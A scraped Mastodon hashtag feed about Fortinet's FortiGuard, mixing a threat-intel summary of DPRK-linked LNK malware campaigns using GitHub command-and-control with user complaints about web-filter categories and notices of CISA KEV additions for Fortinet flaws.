Mastodawn

DPRK-Related Campaigns with LNK and GitHub C2

FortiGuard Labs recently detected a series of LNK files targeting users in South Korea. These attacks use a multi-stage scripting process and leverage GitHub as Command and Control (C2) infrastructure to evade detection. Although these LNK files can be traced back to 2024, earlier versions had less obfuscation and contained significant metadata, allowing us to track similar attacks spreading the XenoRAT malware.

Pulse ID: 69cfceee4f7a6c4305b3d1a4
Pulse Link: https://otx.alienvault.com/pulse/69cfceee4f7a6c4305b3d1a4
Pulse Author: AlienVault
Created: 2026-04-03 14:30:06

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DPRK #FortiGuard #FortiGuardLabs #GitHub #InfoSec #Korea #LNK #Malware #OTX #OpenThreatExchange #RAT #SouthKorea #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Varbin

Feb 26

The categorization of the Fortinet web filter is hilarious. I got a report that a certain website is incorrectly blocked by our firewall. After looking into it, the specific website belongs to a large organization.

Different organizational levels of this large organization are categorized as:

Political organization (federal level)
General organization (state level)
Advocacy organization (local level), giving it an R age rating (18+)

The “correct” classification should be either general organization or simply “business”.

This is wrong on many levels. Why are advocacy groups blocked by default? Why do they have an R rating (because politics is only for adults? But then why only advocacy groups and not political organizations?).

#fortinet #fortigate #fortiguard

Patrick Coyle Nov 19

CISA Adds FortiGuard Vulnerability to KEV Catalog – 11-18-25 – Yet another FortiGuard 0-day exploited vulnerability – https://tinyurl.com/bw93739d #KEV #CISA #FortiGuard

CISA Adds FortiGuard Vulnerability to KEV Catalog – 11-18-25

Today CISA announced that they had added an OS command injection vulnerability in the FortiGuard FortiWeb products to their Known Exploited...

Patrick Coyle Jun 26, 2025

CISA Adds FortiOS Vulnerability to KEV Catalog – 6-25-25 – https://tinyurl.com/3mpfmhm5 #KEV #CISA #FortiGuard

CISA Adds FortiOS Vulnerability to KEV Catalog – 6-25-25

Today CISA announced that it had added a use of hard-coded credentials vulnerability in the FortiGuard FortiOS product to their Known Explo...

Patrick Coyle May 15, 2025

CISA Adds FortiGuard Vulnerability to KEV Catalog – 5-14-25 – Stack-based buffer overflow in five FortiGuard product lines – https://tinyurl.com/ye5m9b7x #KEV #FortiGuard

CISA Adds FortiGuard Vulnerability to KEV Catalog – 5-14-25

Today CISA announced that it had added a stack-based buffer overflow vulnerability in multiple FortiGuard products to their Known Exploited...

dendrite Jan 23, 2025

#Facebook isn't blocked at school but the Illinois Coalition for Immigrant and Refuge rights is. https://www.icirr.org/
Thanks #Fortiguard for that.
Category: Advocacy Organizations.
Why the fuck is that a category to block?
And it looks like it was selected by the school district as well.

Illinois Coalition for Immigrant and Refugee Rights

ICIRR is dedicated to promoting the rights of immigrants and refugees to full and equal participation in the civic, cultural, social, and political life of our diverse society.

ICIRR

hoek 💎Jan 20, 2025

#fortiguard #psirt #fortios #security https://fortiguard.fortinet.com/psirt/FG-IR-24-535 lol

PSIRT | FortiGuard Labs

None

FortiGuard Labs

A. M. H.Oct 13, 2024

I have updated my blog to different yet suitable theme. Everything is good but this one anomaly. When I open one menu from the blog, the browser will redirect the tab to http (and cause fortiguard alert). Changing the http to https manually from the browser fix the problem. What is the problem? my server running nginx and inside the config, there is a directive to redirect http to https (normal configuration)

note: when using freebsd (current laptop), error/block never occurred

#fortiguard #web #hugo

Show thread

Mike Williamson Aug 11, 2024

"Volt Typhoon achieves initial access to targeted organizations through internet-facing #Fortinet #FortiGuard devices."

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

Volt Typhoon targets US critical infrastructure with living-off-the-land techniques | Microsoft Security Blog

Microsoft has uncovered stealthy malicious activity by Volt Typhoon focused on post-compromise credential access & network system discovery.

Microsoft Security Blog

Gestalt IT Mar 21, 2024

Just Posted: The article reviews Fortinet's integration of AI and ML in cybersecurity, underscoring their extensive AI-powered Security Fabric platform and the company's balance of AI innovation with human insight to provide robust cybersecurity solutions. #AI #CyberSecurity #FortiGuard #GenAI #ML #Security #Sponsored
https://gestaltit.com/sponsored/fortinet/gestalt/leveraging-ai-within-cybersecurity-with-fortinet/

Leveraging AI Within Cybersecurity with Fortinet - Gestalt IT

Fortinet's long history of leveraging AI/ML within cybersecurity—and delivering some of the first AI-powered solutions and services to customers in the industry—positions Fortinet as a trailblazer in the cybersecurity landscape. The more than forty unique AI-powered offerings across its Security Fabric platform and the thoughtful way it augments AI/ML with human intelligence underscores Fortinet's commitment to providing adaptive and effective cybersecurity solutions. As threats, tools, and technologies evolve, Fortinet stands ready to address these challenges with innovative solutions—like its FortiGuard AI-Powered Security Services—that bridge the gap between AI innovation and the enduring importance of human expertise.

Gestalt IT